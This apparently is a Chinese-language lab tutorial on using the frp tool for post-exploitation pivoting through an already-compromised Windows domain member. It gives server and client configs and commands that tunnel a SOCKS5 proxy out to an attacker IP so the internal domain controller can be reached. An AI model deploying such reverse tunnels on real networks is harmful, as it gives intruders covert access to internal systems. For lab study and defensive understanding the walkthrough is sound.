frp工具的使用

frp工具的使用

Posted by 木已成舟 on January 18, 2021

frp代理工具在实战中用到的场景比较多,因此掌握frp工具进行代理是必不可少的。

0x00 网络环境

  • 自己搭建了一个域环境,如下图所示,域成员机器(10.10.1.129)通过双网卡和内外网互通。
  • 域控是Windows Server 2012 R2(10.10.1.128),域控上安装了phpstudy,为默认页面,域成员是Windows Server 2008 R2(10.10.1.129)。
  • 以下内容是基于域成员机器已被拿下的场景。
  • 本次实验要达到的目的是通过Windows Server 2008 R2(10.10.1.129)作为跳板访问域控上phpstudy默认页面。

0x01 配置服务端

首先在攻击机上开一个端口供受害者连接,编辑修改frps.ini文件内容如下:

[common]
bind_port = 7777

保存并启动服务端:frps.exe -c ./frps.ini

20210118141119

0x02 配置客户端

将frp上传至Windows Server 2008 R2(10.10.1.129)主机上,并修改frpc.ini文件。

[common]
server_addr = 45.10.20.1 //服务端的IP地址
server_port = 7777  //服务端配置文件中绑定的端口

[plugin_socks]  //设置socks代理
type = tcp
remote_port = 8001
plugin = socks5
plugin_user = mycz
plugin_passwd = xxxx
use_encryption = true
use_compression = true

保存并启动客户端(frpc.exe -c frpc.ini),返回proxy sucecess说明代理成功:

20210118142516

0x03 proxifier代理

本想着通过浏览器的代理直接设置的,但由于浏览器不支持socks5,还需要借助proxifier工具。

点击【配置文件】-【新建代理服务器】,填写IP、端口、账号密码、进行连接。

20210118142753

打开浏览器,选择系统代理,成功访问域控安装的phpstudy默认页面。

20210118143111

20210118143232